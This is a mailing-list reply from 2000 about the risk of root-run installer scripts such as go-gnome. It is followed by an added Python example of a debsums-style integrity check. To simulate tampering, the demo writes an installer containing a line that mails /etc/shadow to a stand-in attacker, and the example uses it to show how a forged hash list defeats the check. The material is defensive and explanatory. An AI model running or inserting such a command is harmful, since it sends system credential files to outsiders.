
Re: Security



on Tue, Nov 07, 2000 at 09:06:32PM -0800, Vijay Prabakaran (vijay_248@yahoo.com) wrote:
> Hi,
> 
>         I have been following the "horrifying suggestion" thread on
> the lists and what you say about the go-gnome script makes perfectly
> good sense. Has anyone talked to Helixcode about the problem? 

I copied Ethan's comments to the site and several specific contacts
there, some time last week.  No response.

> In most distributions all the script does is download the installer
> and in Debian it just adds an extra line in sources file. Telling the
> user to edit sources file and add the extra line and then doing and
> apt-get seems to me to be as simple as what they are asking the user
> to do.  

apt-get does provide some (largely weak) protections -- you are assuming
the site is trusted.  debsums also helps you, though only if they're
accurate in the first place.  Debian packages aren't, AFAIK, signed,
though package maintainers should keep their signatures current (I don't
quite understand what this accomplishes, and would appreciate an
explanation).

> There is no percentage in using the go-gnome script at all
> apart from giving misconceptions to the user about user friendliness.
> And now there are so many sites giving installation scripts to be
> executed as root user. Eazel makes you download an installer script
> for rpm based systems for installing nautilus PR2 and there are many
> more companies like that. Can anything be done to somehow make these
> people understand and use some security measures in the process of
> installing software.

The lone advantage here is that if there are problems with the script,
as it comes from a single, known source, it can be checked and
reported.

There's an aptness to the use of a penguin as the GNU/Linux mascot,
regarding how penguins enter the water.  They crowd the edge of a floe
and jostle.  First bird in the water gets to find out if there's a
leopard seal (mortal enemy) below.  All's well?  The flock goes in.

If there are blatantly apparent problems with someone's
root-access-required script, you can pretty much bet you'll hear about
it.  In short order.  The problem is the non-blatant problems.  I much
prefer things to blow up in my face rather than smolder quietly for days
or weeks -- it's easier to figure out something's going wrong, and
likely, what caused it.


-- 
Karsten M. Self <kmself@ix.netcom.com>     http://www.netcom.com/~kmself
 Evangelist, Zelerate, Inc.                      http://www.zelerate.org
  What part of "Gestalt" don't you understand?      There is no K5 cabal
   http://gestalt-system.sourceforge.net/        http://www.kuro5hin.org
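The message above leans on debsums as a check, with the caveat that it only helps "if they're accurate in the first place". The following is an added example, not code from the thread and not debsums itself: a minimal re-implementation of the debsums check (parse a dpkg-style `<md5>  <path>` list, hash each installed file, report OK/FAILED/MISSING) run against a constructed package tree in a temporary directory rather than `/var/lib/dpkg/info`. The file names and contents are made up for the demonstration. The `demo()` function shows both what the check catches (a modified file) and what it cannot catch (an attacker, or a root-run installer script, that rewrites the md5sums list to match the modified file).

```python
"""Minimal debsums-style integrity check (added example, not the original debsums)."""
import hashlib
import os
import tempfile


def parse_md5sums(text):
    """Parse dpkg md5sums format: one '<32 hex md5>  <path relative to />' per line."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        digest, sep, path = line.partition("  ")
        ok = sep and len(digest) == 32 and all(c in "0123456789abcdef" for c in digest)
        if not ok or not path:
            raise ValueError(f"malformed md5sums line {lineno}: {line!r}")
        entries[path] = digest
    return entries


def md5_of_file(path):
    """Hex MD5 of a file, read in chunks so large binaries do not load into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify(root, md5sums_text):
    """Compare each listed file under `root` with its recorded hash.

    Returns {relative_path: 'OK' | 'FAILED' | 'MISSING'}, mirroring debsums output.
    """
    results = {}
    for rel, expected in parse_md5sums(md5sums_text).items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            results[rel] = "MISSING"
        elif md5_of_file(full) == expected:
            results[rel] = "OK"
        else:
            results[rel] = "FAILED"
    return results


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: clean tree, tampered binary, tampered binary plus forged list.

    Returns the three verify() result dicts in that order.
    """
    # Constructed sample package contents; names are hypothetical.
    files = {
        "usr/bin/example-installer": b"#!/bin/sh\necho installing\n",
        "usr/share/doc/example/README": b"example docs\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            _write(root, rel, data)
        # The md5sums list as the package would have shipped it.
        shipped = "".join(f"{hashlib.md5(d).hexdigest()}  {rel}\n" for rel, d in files.items())
        clean = verify(root, shipped)

        # A quietly modified installer: the shipped list still catches this.
        _write(root, "usr/bin/example-installer", b"#!/bin/sh\necho installing\nmail attacker < /etc/shadow\n")
        tampered = verify(root, shipped)

        # Whoever ran as root can also rewrite the md5sums list to match; the check
        # now passes, which is the "only if they're accurate in the first place" caveat.
        forged = "".join(f"{md5_of_file(os.path.join(root, rel))}  {rel}\n" for rel in files)
        forged_passes = verify(root, forged)
    return clean, tampered, forged_passes


if __name__ == "__main__":
    for label, result in zip(("clean", "tampered", "forged list"), demo()):
        print(label, result)
```

The third result is the point of the caveat: an md5sums list stored on the same filesystem, writable by the same root that ran the installer, is only as trustworthy as whatever last wrote it, so a check like this needs reference hashes taken from a source the installer could not have touched (the original package file, or a list recorded off-host) to mean anything.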
